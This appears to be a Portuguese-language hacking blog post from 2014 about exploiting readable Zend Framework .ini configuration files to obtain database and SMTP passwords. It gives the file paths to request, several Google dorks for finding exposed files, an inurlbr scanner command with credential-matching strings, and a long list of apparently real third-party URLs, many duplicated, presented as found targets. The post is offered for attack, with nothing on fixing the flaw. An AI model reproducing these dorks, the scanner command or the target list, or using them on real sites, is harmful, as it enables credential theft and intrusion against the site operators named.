quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/

Nenhum comentário:

Postar um comentário

............